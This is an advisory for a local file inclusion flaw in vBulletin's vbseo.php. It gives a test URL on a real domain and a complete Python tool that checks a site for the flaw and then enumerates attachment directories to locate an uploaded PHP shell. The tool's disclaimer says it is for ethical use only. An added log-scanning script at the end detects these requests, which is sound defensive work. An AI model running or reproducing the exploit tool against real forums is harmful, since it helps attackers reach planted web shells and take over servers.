vBulletin vbseo.php Local File Inclusion Vulnerability
Source: vfocus.net  Author: MaXe  Published: 2010-09-16

Test URL:

http://www.nuanyue.com/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html

Exploitation:

#!/usr/bin/python
 
#  ______          __                  __  __     __   ______
# /\__  _\        /\ \__              /\ \/\ \  /'__`\/\__  _\
# \/_/\ \/     ___\ \ ,_\    __   _ __\ \ `\\ \/\ \/\ \/_/\ \/
#    \ \ \   /' _ `\ \ \/  /'__`\/\`'__\ \ , ` \ \ \ \ \ \ \ \
#     \_\ \__/\ \/\ \ \ \_/\  __/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \
#     /\_____\ \_\ \_\ \__\ \____\\ \_\  \ \_\ \_\ \____/  \ \_\
#     \/_____/\/_/\/_/\/__/\/____/ \/_/   \/_/\/_/\/___/    \/_/
#      --------------------------------------------------------
#		Title:	vBSEO LFI Assistant Tool
#	       Author:	MaXe
#		 Site: 	http://www.intern0t.net
#
#	  Description: 	1) Checks whether the vBSEO installation
#			is patched or not. 2) Attempts to find
#			the physical location of an uploaded
#			attachment phile. (PHP Shell)
#
#	      Version:	2.1.4 - Reversed Algorithm - Basic Version
#
#	      License:	-- Attribution-ShareAlike 3.0 Unported --
#			http://creativecommons.org/licenses/by-sa/3.0/
#
#		Notes:	The basic version does not contain multi-
#			threading nor is it able to search through
#			multiple sub directories which the advanced
#			version will be able to.
#			Please note, that this tool does not work on
#			all types of hosts and you should therefore
#			modify this script to your own needs.
#
#	   Disclaimer:	This tool is meant for ethical purposes only.
 
# Import the appropriate libraries.
import os
import re
import httplib
import sys
 
# Clear the screen in a sufficient way.
if(os.name) == "posix":
    os.system("clear")
elif(os.name) == "nt":
    os.system("cls")
else:
    print "[!] Cannot clear screen automatically.\n"
 
print "File Finder by MaXe from InterN0T.net\n\n"
 
# Get user-input and define global variables.
target = raw_input("Enter a domain to scan: ")
file_match = raw_input("Enter a keyword to look for: ")
main_dir = ["attach","attachment","attachments","download"]
poss_main_dir = []
sub_dir = []
 
# Strip away http and https from the target variable.
striptarget = re.compile('(http://|https://)')
newtarget = striptarget.sub('', target)
 
# Perform a simple LFI to check whether the target is vulnerable or not.
conn = httplib.HTTPConnection(newtarget, 80)
print "[*] Checking if site appears to be vulnerable."
conn.request("GET", "/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html")
resp = conn.getresponse()
 
# If the response code is 200 OK, check if the file really was included.
if resp.status == 200:
	print "[+] Site is responding, this is good."
	if re.search("(Enter text...)", resp.read()):
		print ">> The site appears to be vulnerable!"
	else:
		print "[!] The site appears to be patched. (unknown error)"
 
elif resp.status == 404:
	print "[!] The site appears to be patched. (404)"
 
# Search for attachment directories
for value in main_dir[0:]:
	conn = httplib.HTTPConnection(newtarget, 80)
	print "[*] Trying: http://%s/%s/" % (newtarget,value)
	conn.request("HEAD", "/%s/" % value)
	resp = conn.getresponse()
 
	# If the response code is 403 (Forbidden), set a new variable and continue.
	if resp.status == 403:
		print "[+] Directory found: /%s/" % value
 
		if poss_main_dir == []:
			poss_main_dir = ["%s" % value]
		else:
			poss_main_dir += ["%s" % value]
 
	conn.close()
 
if poss_main_dir == []:
	print "[!] No directories were found, exiting."
	sys.exit()
 
# Search for possible sub directories
for value in poss_main_dir:
 
	i = 0
	print "[*] Trying subdirs within: http://%s/%s/" % (newtarget,value)
	while i <= 9:
		conn = httplib.HTTPConnection(newtarget, 80)
		conn.request("HEAD",  "/%s/%s/" % (value,i))
		resp = conn.getresponse()
 
		if resp.status == 403:
			print "[+] Sub Directory found: /%s/%s/" % (value,i)
			found = "%s/%s" % (value,i)
 
			if sub_dir == []:
				sub_dir = ["%s" % found]
			else:
				sub_dir += ["%s" % found]
 
		i=i+1
		conn.close()
 
if sub_dir == []:
	print "[!] No sub directories were found, exiting."
	sys.exit()
 
# Search all the sub directories found for our phile
for value in sub_dir[0:]:
	i = 99
	print "[*] Trying to find our file within: /%s/" % value
	while i >= 0:
		conn = httplib.HTTPConnection(newtarget, 80)
		conn.request("GET", "/%s/%s.attach" % (value,i))
		resp = conn.getresponse()
 
		if resp.status == 200:
			print "[+] File found, does it match our keyword? >> %s" % file_match
 
			if re.search("(%s)" % file_match, resp.read()):
				print ">> File contains our keyword!"
				print "Part URL: /%s/%s.attach" % (value,i)
				print "Full URL: http://" + newtarget + "/%s/%s.attach \n" % (value,i)
				sys.exit(0)
 
		i=i-1
		conn.close()
 
# Don't forget, that this script can be used for more than one thing.
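
A defender-side check for the traffic this script generates, as an added example that is not part of the original post: it scans web access logs for the vbseo.php inclusion request shape (vbseoembedd together with vbseourl) and for the attachment-directory enumeration that follows it. The log lines, the function names and the burst threshold are constructed assumptions; the directory names and the .attach layout are taken from the script above.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [16/Sep/2010:10:00:01 +0000] "GET /vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html HTTP/1.1" 200 512
198.51.100.7 - - [16/Sep/2010:10:00:02 +0000] "HEAD /attach/ HTTP/1.1" 404 0
198.51.100.7 - - [16/Sep/2010:10:00:02 +0000] "HEAD /attachments/ HTTP/1.1" 403 0
198.51.100.7 - - [16/Sep/2010:10:00:03 +0000] "HEAD /attachments/3/ HTTP/1.1" 403 0
198.51.100.7 - - [16/Sep/2010:10:00:04 +0000] "GET /attachments/3/99.attach HTTP/1.1" 404 0
198.51.100.7 - - [16/Sep/2010:10:00:04 +0000] "GET /attachments/3/98.attach HTTP/1.1" 200 2048
203.0.113.20 - - [16/Sep/2010:10:05:00 +0000] "GET /vbseo.php?vbseourl=showthread.php HTTP/1.1" 200 9000
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Directory names and numeric .attach layout that the script on this page walks.
ENUM_RE = re.compile(r'^/(attach|attachment|attachments|download)/(\d+/)?(\d+\.attach)?$')

def classify(target):
    """Return (kind, detail) for a request target, or None if unremarkable."""
    parts = urlsplit(target)
    if parts.path.lower().endswith("/vbseo.php"):
        query = parse_qs(parts.query, keep_blank_values=True)
        # Embed mode plus a caller-supplied path is the inclusion request shape.
        if "vbseoembedd" in query and query.get("vbseourl"):
            return ("lfi-probe", query["vbseourl"][0])
    if ENUM_RE.match(parts.path):
        return ("attach-enum", parts.path)
    return None

def scan(log_text, enum_threshold=3):
    """Group findings per client IP: inclusion requests and enumeration bursts."""
    probes, enum = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        hit = classify(m.group(3)) if m else None
        if hit:
            bucket = probes if hit[0] == "lfi-probe" else enum
            bucket[m.group(1)].append((hit[1], int(m.group(4))))
    report = {}
    for ip in set(probes) | set(enum):
        burst = enum[ip] if len(enum[ip]) >= enum_threshold else []
        if probes[ip] or burst:
            report[ip] = {
                "inclusion_requests": probes[ip],
                "enumeration": burst,
                "attach_served": [p for p, s in burst if s == 200 and p.endswith(".attach")],
            }
    return report
```

An entry in attach_served means a numbered .attach file was returned with a 200 during an enumeration burst, which is the request to review first.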

 